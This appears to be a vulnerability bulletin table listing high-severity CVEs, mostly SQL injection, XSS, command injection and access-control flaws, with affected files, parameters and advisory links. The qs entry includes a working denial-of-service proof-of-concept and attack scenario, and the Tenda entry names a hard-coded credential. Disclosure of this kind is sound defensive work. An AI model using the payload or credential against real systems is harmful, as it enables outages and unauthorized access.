| Campcodes--Supplier Management System | A flaw has been found in Campcodes Supplier Management System 1.0. This impacts an unknown function of the file /admin/add_area.php. Executing manipulation of the argument txtAreaCode can lead to sql injection. The attack may be performed remotely. The exploit has been published and may be used. | 2025-12-29 | 7.3 | CVE-2025-15206 | VDB-338579 | Campcodes Supplier Management System add_area.php sql injection VDB-338579 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #723951 | Campcodes Supplier Management System V1.0 SQL Injection https://github.com/IMZGforever/CVEs/issues/5 https://www.campcodes.com/ |
| Campcodes--Supplier Management System | A vulnerability has been found in Campcodes Supplier Management System 1.0. Affected is an unknown function of the file /admin/view_products.php. The manipulation of the argument chkId[] leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-12-29 | 7.3 | CVE-2025-15207 | VDB-338580 | Campcodes Supplier Management System view_products.php sql injection VDB-338580 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #723953 | Campcodes Supplier Management System 1.0 SQL Injection https://github.com/IMZGforever/CVEs/issues/6 https://www.campcodes.com/ |
| code-projects--Refugee Food Management System | A security flaw has been discovered in code-projects Refugee Food Management System 1.0. Affected by this issue is some unknown functionality of the file /home/editrefugee.php. The manipulation of the argument rfid results in sql injection. The attack can be launched remotely. The exploit has been released to the public and may be exploited. | 2025-12-29 | 7.3 | CVE-2025-15208 | VDB-338593 | code-projects Refugee Food Management System editrefugee.php sql injection VDB-338593 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721753 | Code-projects Refugee Food Management System v1.0 SQL Injection https://github.com/11alert/CVE/issues/1 https://code-projects.org/ |
| Sunnet--WMPro | WMPro developed by Sunnet has an Arbitrary File Read vulnerability, allowing unauthenticated remote attackers to exploit Relative Path Traversal to read arbitrary system files. | 2025-12-29 | 7.5 | CVE-2025-15225 | https://www.twcert.org.tw/tw/cp-132-10602-c1c69-1.html https://www.twcert.org.tw/en/cp-139-10603-67149-2.html |
| WELLTEND TECHNOLOGY--BPMFlowWebkit | BPMFlowWebkit developed by WELLTEND TECHNOLOGY has an Arbitrary File Read vulnerability, allowing unauthenticated remote attackers to exploit Absolute Path Traversal to download arbitrary system files. | 2025-12-29 | 7.5 | CVE-2025-15227 | https://www.twcert.org.tw/tw/cp-132-10604-c65aa-1.html https://www.twcert.org.tw/en/cp-139-10605-426b6-2.html |
| code-projects--Simple Stock System | A flaw has been found in code-projects Simple Stock System 1.0. This affects an unknown function of the file /market/login.php. Executing manipulation of the argument Username can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used. | 2025-12-30 | 7.3 | CVE-2025-15243 | VDB-338633 | code-projects Simple Stock System login.php sql injection VDB-338633 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725689 | Code-Projects Simple Stock System V1.0 SQL Injection https://github.com/c13641462064-lgtm/sql_injection/issues/1 https://code-projects.org/ |
| gmg137--snap7-rs | A vulnerability was identified in gmg137 snap7-rs up to 153d3e8c16decd7271e2a5b2e3da4d6f68589424. Affected by this issue is the function snap7_rs::client::S7Client::download of the file client.rs. Such manipulation leads to heap-based buffer overflow. The attack can be executed remotely. The exploit is publicly available and might be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-30 | 7.3 | CVE-2025-15247 | VDB-338637 | gmg137 snap7-rs client.rs download heap-based overflow VDB-338637 | CTI Indicators (IOB, IOC, IOA) https://gitee.com/gmg137/snap7-rs/issues/ID2H7V |
| Edimax--BR-6208AC | A vulnerability was identified in Edimax BR-6208AC 1.02/1.03. Affected is the function formStaDrvSetup of the file /goform/formStaDrvSetup of the component Web-based Configuration Interface. The manipulation of the argument rootAPmac leads to command injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. Edimax confirms this issue: "The product mentioned, EDIMAX BR-6208AC V2, has reached its End of Life (EOL) status. It is no longer supported or maintained by Edimax, and it is no longer available for purchase in the market. Consequently, there will be no further firmware updates or patches for this device. We recommend users upgrade to newer models for better security." This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-30 | 7.3 | CVE-2025-15256 | VDB-338646 | Edimax BR-6208AC Web-based Configuration formStaDrvSetup command injection VDB-338646 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #722014 | Edimax BR-6208AC V2_1.02 Command Injection https://tzh00203.notion.site/EDIMAX-BR-6208AC-V2_1-02-Command-Injection-Vulnerability-in-Web-formStaDrvSetup-handler-2d2b5c52018a803ebd91c200b3e2925b?source=copy_link |
| Edimax--BR-6208AC | A security flaw has been discovered in Edimax BR-6208AC 1.02/1.03. Affected by this vulnerability is the function formRoute of the file /gogorm/formRoute of the component Web-based Configuration Interface. The manipulation of the argument strIp/strMask/strGateway results in command injection. The attack can be executed remotely. The exploit has been released to the public and may be exploited. Edimax confirms this issue: "The product mentioned, EDIMAX BR-6208AC V2, has reached its End of Life (EOL) status. It is no longer supported or maintained by Edimax, and it is no longer available for purchase in the market. Consequently, there will be no further firmware updates or patches for this device. We recommend users upgrade to newer models for better security." This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-30 | 7.3 | CVE-2025-15257 | VDB-338647 | Edimax BR-6208AC Web-based Configuration formRoute command injection VDB-338647 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #722426 | Edimax BR-6208AC V2_1.02 Command Injection https://tzh00203.notion.site/EDIMAX-BR-6208AC-V2_1-02-Command-Injection-Vulnerability-in-Web-formRoute-handler-2d3b5c52018a805983d3cf0780b28407?source=copy_link |
| BiggiDroid--Simple PHP CMS | A weakness has been identified in BiggiDroid Simple PHP CMS 1.0. Affected is an unknown function of the file /admin/login.php of the component Admin Login. Executing manipulation of the argument Username can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be exploited. | 2025-12-30 | 7.3 | CVE-2025-15263 | VDB-338657 | BiggiDroid Simple PHP CMS Admin Login login.php sql injection VDB-338657 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725820 | BiggiDroid Simple-PHP-Blog 1.0 SQL Injection https://gitee.com/devilrunsun/mywork/issues/IDGMME |
| n/a--FeehiCMS | A vulnerability was determined in FeehiCMS up to 2.1.1. Impacted is an unknown function of the file frontend/web/timthumb.php of the component TimThumb. Executing manipulation of the argument src can lead to server-side request forgery. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-30 | 7.3 | CVE-2025-15264 | VDB-338663 | FeehiCMS TimThumb timthumb.php server-side request forgery VDB-338663 | CTI Indicators (IOB, IOC, IOA) Submit #718278 | FeehiCMS https://github.com/liufee/cms v2.1.1 Server-Side Request Forgery |
| HTTP--DOS | Improper Input Validation vulnerability in qs (parse modules) allows HTTP DoS. This issue affects qs: < 6.14.1. Summary: The arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable. Details: The arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2). Vulnerable code (lib/parse.js:159-162): `if (root === '[]' && options.parseArrays) { obj = utils.combine([], leaf); } // no arrayLimit check`. Working code (lib/parse.js:175): `else if (index <= options.arrayLimit) { obj = []; obj[index] = leaf; } // limit checked here`. The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays. PoC, Test 1 (basic bypass): `npm install qs`, then `const qs = require('qs'); const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 }); console.log(result.a.length); // Output: 6 (should be max 5)`. Test 2 (DoS demonstration): `const qs = require('qs'); const attack = 'a[]=' + Array(10000).fill('x').join('&a[]='); const result = qs.parse(attack, { arrayLimit: 100 }); console.log(result.a.length); // Output: 10000 (should be max 100)`. Configuration: arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2); use bracket notation a[]=value (not indexed a[0]=value). Impact: Denial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection. Attack scenario: the attacker sends an HTTP request GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times); the application parses it with qs.parse(query, { arrayLimit: 100 }); qs ignores the limit and parses all 100,000 elements into an array; server memory is exhausted and the application crashes or becomes unresponsive; the service is unavailable for all users. Real-world impact: a single malicious request can crash the server; no authentication is required; the attack is easy to automate and scale; any endpoint parsing query strings with bracket notation is affected. | 2025-12-29 | 7.5 | CVE-2025-15284 | https://github.com/ljharb/qs/security/advisories/GHSA-6rw7-vpxm-498p https://github.com/ljharb/qs/commit/3086902ecf7f088d0d1803887643ac6c03d415b9 |
| itsourcecode--Society Management System | A vulnerability was detected in itsourcecode Society Management System 1.0. Impacted is the function edit_admin_query of the file /admin/edit_admin_query.php. Performing manipulation of the argument Username results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. | 2025-12-30 | 7.3 | CVE-2025-15353 | VDB-338740 | itsourcecode Society Management System edit_admin_query.php edit_admin_query sql injection VDB-338740 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #726280 | itsourcecode Society Management System V1.0 SQL injection https://github.com/BUPT2025201/CVE/issues/4 https://itsourcecode.com/ |
| itsourcecode--Society Management System | A flaw has been found in itsourcecode Society Management System 1.0. The affected element is an unknown function of the file /admin/add_admin.php. Executing manipulation of the argument Username can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used. | 2025-12-30 | 7.3 | CVE-2025-15354 | VDB-338741 | itsourcecode Society Management System add_admin.php sql injection VDB-338741 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #726282 | itsourcecode Society Management System V1.0 SQL injection https://github.com/BUPT2025201/CVE/issues/2 https://itsourcecode.com/ |
| Delta Electronics--DVP-12SE11T | DVP-12SE11T - Denial of Service Vulnerability | 2025-12-30 | 7.5 | CVE-2025-15358 | https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2025-00022_DVP-12SE11T%20Multiple%20Vulnerabilities.pdf |
| Tenda--i24 | A vulnerability has been found in Tenda i24, 4G03 Pro, 4G05, 4G08, G0-8G-PoE, Nova MW5G and TEG5328F up to 65.10.15.6. Affected is an unknown function of the component Shadow File. Such manipulation with the input Fireitup leads to hard-coded credentials. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. | 2025-12-31 | 7.8 | CVE-2025-15371 | VDB-339075 | Tenda i24 Shadow File hard-coded credentials VDB-339075 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #727155 | Tenda Tenda i24v3.0 V3.0.0.8(4008) V3.0.0.8(4008) Hard-coded Credentials Submit #727283 | Tenda 4G03ProV1.0re V04.03.01.49 Hard-coded Credentials (Duplicate) Submit #727284 | Tenda 4G05V1.0re V04.05.01.15 Hard-coded Credentials (Duplicate) Submit #727285 | Tenda 4G08V1.0re V04.08.01.28 Hard-coded Credentials (Duplicate) Submit #727302 | Tenda G0-8G-PoEV2.0si V16.01.8.5 Hard-coded Credentials (Duplicate) Submit #727305 | Tenda MW5GV1.0re V1.0.0.35 Hard-coded Credentials (Duplicate) Submit #727306 | Tenda TEG5328FV1.0ma V65.10.15.6 Hard-coded Credentials (Duplicate) https://github.com/vuln-1/vuln/blob/main/Tenda/i24v3.0_V3.0.0.8/report-1.md https://www.tenda.com.cn/ |
| code-projects--Online Guitar Store | A vulnerability has been found in code-projects Online Guitar Store 1.0. This impacts an unknown function of the file /admin/Create_category.php. Such manipulation of the argument dre_Ctitle leads to sql injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. | 2026-01-01 | 7.3 | CVE-2025-15407 | VDB-339327 | code-projects Online Guitar Store Create_category.php sql injection VDB-339327 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #728391 | Code-projects Online Guitar Store v1.0 SQL Injection https://github.com/jjjjj-zr/jjjjjzr19/issues/1 https://code-projects.org/ |
| code-projects--Online Guitar Store | A vulnerability was found in code-projects Online Guitar Store 1.0. Affected is an unknown function of the file /admin/Create_product.php. Performing manipulation of the argument dre_title results in sql injection. The attack can be carried out remotely. The exploit has been made public and could be used. | 2026-01-01 | 7.3 | CVE-2025-15408 | VDB-339328 | code-projects Online Guitar Store Create_product.php sql injection VDB-339328 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #728392 | Code-projects Online Guitar Store v1.0 SQL Injection https://github.com/jjjjj-zr/jjjjjzr19/issues/2 https://code-projects.org/ |
| code-projects--Online Guitar Store | A vulnerability was determined in code-projects Online Guitar Store 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/Delete_product.php. Executing manipulation of the argument del_pro can lead to sql injection. The attack may be performed remotely. The exploit has been publicly disclosed and may be utilized. | 2026-01-01 | 7.3 | CVE-2025-15409 | VDB-339329 | code-projects Online Guitar Store Delete_product.php sql injection VDB-339329 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #728393 | Code-projects Online Guitar Store v1.0 SQL Injection https://github.com/jjjjj-zr/jjjjjzr19/issues/3 https://code-projects.org/ |
| code-projects--Online Guitar Store | A vulnerability was identified in code-projects Online Guitar Store 1.0. Affected by this issue is some unknown functionality of the file /login.php. The manipulation of the argument L_email leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. | 2026-01-01 | 7.3 | CVE-2025-15410 | VDB-339330 | code-projects Online Guitar Store login.php sql injection VDB-339330 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #728394 | Code-projects Online Guitar Store v1.0 SQL Injection https://github.com/jjjjj-zr/jjjjjzr19/issues/4 https://code-projects.org/ |
| Yonyou--KSOA | A security vulnerability has been detected in Yonyou KSOA 9.0. This affects an unknown part of the file /worksheet/agent_work_report.jsp. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 7.3 | CVE-2025-15420 | VDB-339342 | Yonyou KSOA agent_work_report.jsp sql injection VDB-339342 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721099 | Yonyou KSOA V9.0 SQL Injection Submit #721531 | Yonyou KSOA V9.0 SQL Injection (Duplicate) https://github.com/master-abc/cve/blob/main/Yonyou%20Space-Time%20Enterprise%20Information%20Integration%20KSOA%20Platformworksheetagent_work_report.jsp%20SQL%20injection.md |
| Yonyou--KSOA | A vulnerability was detected in Yonyou KSOA 9.0. This vulnerability affects unknown code of the file /worksheet/agent_worksadd.jsp of the component HTTP GET Parameter Handler. The manipulation of the argument ID results in sql injection. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 7.3 | CVE-2025-15421 | VDB-339343 | Yonyou KSOA HTTP GET Parameter agent_worksadd.jsp sql injection VDB-339343 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721324 | Yonyou KSOA V9.0 SQL Injection Submit #721527 | Yonyou KSOA V9.0 SQL Injection (Duplicate) https://github.com/master-abc/cve/blob/main/Yonyou%20Space-Time%20Enterprise%20Information%20Integration%20KSOA%20Platformworksheetagent_worksadd.jsp%20SQL%20injection.md |
| Yonyou--KSOA | A vulnerability was found in Yonyou KSOA 9.0. The affected element is an unknown function of the file /worksheet/agent_worksdel.jsp of the component HTTP GET Parameter Handler. Performing manipulation of the argument ID results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 7.3 | CVE-2025-15424 | VDB-339346 | Yonyou KSOA HTTP GET Parameter agent_worksdel.jsp sql injection VDB-339346 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721348 | Yonyou KSOA V9.0 SQL Injection Submit #721526 | Yonyou KSOA V9.0 SQL Injection (Duplicate) https://github.com/master-abc/cve/blob/main/Yonyou%20Space-Time%20Enterprise%20Information%20Integration%20KSOA%20Platformworksheetagent_worksdel.jsp%20SQL%20injection.md https://github.com/master-abc/cve/blob/main/Yonyou%20Space-Time%20Enterprise%20Information%20Integration%20KSOA%20Platformworksheetagent_worksdel.jsp%20SQL%20injection.md#vulnerability-details-and-poc |
| Yonyou--KSOA | A vulnerability was determined in Yonyou KSOA 9.0. The impacted element is an unknown function of the file /worksheet/del_user.jsp of the component HTTP GET Parameter Handler. Executing manipulation of the argument ID can lead to sql injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 7.3 | CVE-2025-15425 | VDB-339347 | Yonyou KSOA HTTP GET Parameter del_user.jsp sql injection VDB-339347 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721352 | Yonyou KSOA V9.0 SQL Injection https://github.com/master-abc/cve/blob/main/Yonyou%20Space-Time%20Enterprise%20Information%20Integration%20KSOA%20Platform%20worksheet%20del_user.jsp%20SQL%20injection.md https://github.com/master-abc/cve/blob/main/Yonyou%20Space-Time%20Enterprise%20Information%20Integration%20KSOA%20Platform%20worksheet%20del_user.jsp%20SQL%20injection.md#vulnerability-details-and-poc |
| jackying--H-ui.admin | A vulnerability was identified in jackying H-ui.admin up to 3.1. This affects an unknown function in the library /lib/webuploader/0.1.5/server/preview.php. The manipulation leads to unrestricted upload. The attack can be carried out remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 7.3 | CVE-2025-15426 | VDB-339348 | jackying H-ui.admin preview.php unrestricted upload VDB-339348 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721457 | https://www.h-ui.net/ H-ui.admin v3.1 RCE https://github.com/TiKi-r/CVE-Report/blob/main/H-ui.admin%20RCE.md https://github.com/TiKi-r/CVE-Report/blob/main/H-ui.admin%20RCE.md#4-proof-of-concept-poc |
| Seeyon--Zhiyuan OA Web Application System | A security flaw has been discovered in Seeyon Zhiyuan OA Web Application System up to 20251222. This impacts an unknown function of the file /carManager/carUseDetailList.j%73p. The manipulation of the argument CAR_BRAND_NO results in sql injection. The attack may be performed remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 7.3 | CVE-2025-15427 | VDB-339349 | Seeyon Zhiyuan OA Web Application System carUseDetailList.j%73p sql injection VDB-339349 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721493 | Seeyou Collaborative Platform V1.0 SQL Injection https://github.com/cly-yuxiu/CVE/issues/2 |
| Yonyou--KSOA | A vulnerability was detected in Yonyou KSOA 9.0. Affected is an unknown function of the file /kp/PrintZPYG.jsp. The manipulation of the argument zpjhid results in sql injection. It is possible to launch the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 7.3 | CVE-2025-15434 | VDB-339361 | Yonyou KSOA PrintZPYG.jsp sql injection VDB-339361 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721490 | Yonyou KSOA V1.0 SQL Injection https://github.com/cly-yuxiu/CVE/issues/1 |
| Yonyou--KSOA | A flaw has been found in Yonyou KSOA 9.0. Affected by this vulnerability is an unknown functionality of the file /worksheet/work_update.jsp. This manipulation of the argument Report causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 7.3 | CVE-2025-15435 | VDB-339362 | Yonyou KSOA work_update.jsp sql injection VDB-339362 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721918 | Yonyou KSOA V1.0 SQL Injection https://github.com/xiaozipang/CVE/issues/1 |
| Yonyou--KSOA | A vulnerability has been found in Yonyou KSOA 9.0. Affected by this issue is some unknown functionality of the file /worksheet/work_edit.jsp. Such manipulation of the argument Report leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 7.3 | CVE-2025-15436 | VDB-339363 | Yonyou KSOA work_edit.jsp sql injection VDB-339363 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721925 | Yonyou KSOA V1.0 SQL Injection https://github.com/xinshou-test/CVE/issues/2 |
| Seeyon--Zhiyuan OA Web Application System | A flaw has been found in Seeyon Zhiyuan OA Web Application System up to 20251223. The impacted element is an unknown function of the file /assetsGroupReport/fixedAssetsList.j%73p. Executing a manipulation of the argument unitCode can lead to sql injection. The attack may be performed remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-04 | 7.3 | CVE-2025-15446 | VDB-339479 | Seeyon Zhiyuan OA Web Application System fixedAssetsList.j%73p sql injection VDB-339479 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721917 | Seeyou Collaborative Platform V1.0 SQL Injection https://github.com/xiaozipang/CVE/issues/2 |
| Seeyon--Zhiyuan OA Web Application System | A vulnerability has been found in Seeyon Zhiyuan OA Web Application System up to 20251223. This affects an unknown function of the file /assetsGroupReport/assetsService.j%73p. The manipulation of the argument unitCode leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-04 | 7.3 | CVE-2025-15447 | VDB-339480 | Seeyon Zhiyuan OA Web Application System assetsService.j%73p sql injection VDB-339480 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721926 | Seeyou Collaborative Platform V1.0 SQL Injection https://github.com/xinshou-test/CVE/issues/1 |
| Rakessh--Ads24 Lite | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rakessh Ads24 Lite allows Reflected XSS. This issue affects Ads24 Lite: from n/a through 1.0. | 2025-12-29 | 7.1 | CVE-2025-23458 | https://vdp.patchstack.com/database/wordpress/plugin/wp-ad-management/vulnerability/wordpress-ads24-lite-plugin-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Sleekplan--Sleekplan | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sleekplan allows Reflected XSS. This issue affects Sleekplan: from n/a through 0.2.0. | 2025-12-29 | 7.1 | CVE-2025-23469 | https://vdp.patchstack.com/database/wordpress/plugin/sleekplan/vulnerability/wordpress-sleekplan-plugin-0-2-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Kemal YAZICI--Product Puller | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kemal YAZICI Product Puller allows Reflected XSS. This issue affects Product Puller: from n/a through 1.5.1. | 2025-12-29 | 7.1 | CVE-2025-23550 | https://vdp.patchstack.com/database/wordpress/plugin/product-puller/vulnerability/wordpress-product-puller-plugin-1-5-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Jakub Glos--Off Page SEO | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jakub Glos Off Page SEO allows Reflected XSS. This issue affects Off Page SEO: from n/a through 3.0.3. | 2025-12-29 | 7.1 | CVE-2025-23554 | https://vdp.patchstack.com/database/wordpress/plugin/off-page-seo/vulnerability/wordpress-off-page-seo-plugin-3-0-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Omar Mohamed Mohamoud--LIVE TV | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Omar Mohamed Mohamoud LIVE TV allows Reflected XSS. This issue affects LIVE TV: from n/a through 1.2. | 2025-12-31 | 7.1 | CVE-2025-23608 | https://vdp.patchstack.com/database/wordpress/plugin/live-tv/vulnerability/wordpress-live-tv-plugin-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Christopher Churchill--custom-post-edit | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Christopher Churchill custom-post-edit allows Reflected XSS. This issue affects custom-post-edit: from n/a through 1.0.4. | 2025-12-31 | 7.1 | CVE-2025-23667 | https://vdp.patchstack.com/database/wordpress/plugin/front-end-post-edit/vulnerability/wordpress-custom-post-edit-plugin-1-0-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Terry Zielke--Zielke Design Project Gallery | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Terry Zielke Zielke Design Project Gallery allows Reflected XSS. This issue affects Zielke Design Project Gallery: from n/a through 2.5.0. | 2025-12-31 | 7.1 | CVE-2025-23705 | https://vdp.patchstack.com/database/wordpress/plugin/zielke-design-project-gallery/vulnerability/wordpress-zielke-design-project-gallery-plugin-2-5-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Matamko--En Masse | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Matamko En Masse allows Reflected XSS. This issue affects En Masse: from n/a through 1.0. | 2025-12-31 | 7.1 | CVE-2025-23707 | https://vdp.patchstack.com/database/wordpress/plugin/en-masse-wp/vulnerability/wordpress-en-masse-plugin-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| zckevin--ZhinaTwitterWidget | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in zckevin ZhinaTwitterWidget allows Reflected XSS. This issue affects ZhinaTwitterWidget: from n/a through 1.0. | 2025-12-31 | 7.1 | CVE-2025-23719 | https://vdp.patchstack.com/database/wordpress/plugin/zhina-twitter-widget/vulnerability/wordpress-zhinatwitterwidget-plugin-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Proloy Chakroborty--ZD Scribd iPaper | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Proloy Chakroborty ZD Scribd iPaper allows Reflected XSS. This issue affects ZD Scribd iPaper: from n/a through 1.0. | 2025-12-31 | 7.1 | CVE-2025-23757 | https://vdp.patchstack.com/database/wordpress/plugin/zd-scribd-ipaper/vulnerability/wordpress-zd-scribd-ipaper-plugin-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Themefy--Bloggie | Cross-Site Request Forgery (CSRF) vulnerability in Themefy Bloggie allows Reflected XSS. This issue affects Bloggie: from n/a through 2.0.8. | 2025-12-31 | 7.1 | CVE-2025-31054 | https://vdp.patchstack.com/database/wordpress/theme/bloggie/vulnerability/wordpress-bloggie-2-0-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Petlibro--Smart Pet Feeder Platform | Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an authorization bypass vulnerability that allows unauthorized users to add users as shared owners to any device by exploiting missing permission checks. Attackers can send requests to the device share API to gain unauthorized access to devices and view owner information without proper authorization validation. | 2026-01-03 | 7.3 | CVE-2025-3646 | Security Research: Petlibro: Your Pet Feeder Is Feeding Data To Anyone Who Asks VulnCheck Advisory: Petlibro Smart Pet Feeder Platform through 1.7.31 Authorization Bypass via Device Share API |
| Petlibro--Smart Pet Feeder Platform | Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an improper access control vulnerability that allows unauthorized device manipulation by accepting arbitrary serial numbers without ownership verification. Attackers can control any device by sending serial numbers to device control APIs to change feeding schedules, trigger manual feeds, access camera feeds, and modify device settings without authorization checks. | 2026-01-03 | 7.3 | CVE-2025-3653 | Security Research: Petlibro: Your Pet Feeder Is Feeding Data To Anyone Who Asks VulnCheck Advisory: Petlibro Smart Pet Feeder through 1.7.31 Platform Improper Access Control via API endpoint |
| ZoomSounds--ZoomSounds | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ZoomSounds allows Reflected XSS. This issue affects ZoomSounds: from n/a through 6.91. | 2025-12-31 | 7.1 | CVE-2025-47566 | https://vdp.patchstack.com/database/wordpress/plugin/dzs-zoomsounds/vulnerability/wordpress-zoomsounds-plugin-6-91-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Zoho Mail--Zoho ZeptoMail | Cross-Site Request Forgery (CSRF) vulnerability in Zoho Mail Zoho ZeptoMail allows Stored XSS. This issue affects Zoho ZeptoMail: from n/a through 3.3.1. | 2025-12-31 | 7.1 | CVE-2025-49028 | https://vdp.patchstack.com/database/wordpress/plugin/transmail/vulnerability/wordpress-zoho-zeptomail-plugin-3-3-1-cross-site-request-forgery-csrf-to-stored-xss-vulnerability?_s_id=cve |
| Wolfgang Häfelinger--Custom Style | Cross-Site Request Forgery (CSRF) vulnerability in Wolfgang Häfelinger Custom Style allows Stored XSS. This issue affects Custom Style: from n/a through 1.0. | 2025-12-31 | 7.1 | CVE-2025-49342 | https://vdp.patchstack.com/database/wordpress/plugin/custom-style/vulnerability/wordpress-custom-style-plugin-1-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Socialprofilr--Social Profilr | Cross-Site Request Forgery (CSRF) vulnerability in Socialprofilr Social Profilr allows Stored XSS. This issue affects Social Profilr: from n/a through 1.0. | 2025-12-31 | 7.1 | CVE-2025-49343 | https://vdp.patchstack.com/database/wordpress/plugin/social-profilr-display-social-network-profile/vulnerability/wordpress-social-profilr-plugin-1-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Rene Ade--SensitiveTagCloud | Cross-Site Request Forgery (CSRF) vulnerability in Rene Ade SensitiveTagCloud allows Stored XSS. This issue affects SensitiveTagCloud: from n/a through 1.4.1. | 2025-12-31 | 7.1 | CVE-2025-49344 | https://vdp.patchstack.com/database/wordpress/plugin/sensitive-tag-cloud/vulnerability/wordpress-sensitivetagcloud-plugin-1-4-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| mg12--WP-EasyArchives | Cross-Site Request Forgery (CSRF) vulnerability in mg12 WP-EasyArchives allows Stored XSS. This issue affects WP-EasyArchives: from n/a through 3.1.2. | 2025-12-31 | 7.1 | CVE-2025-49345 | https://vdp.patchstack.com/database/wordpress/plugin/wp-easyarchives/vulnerability/wordpress-wp-easyarchives-plugin-3-1-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
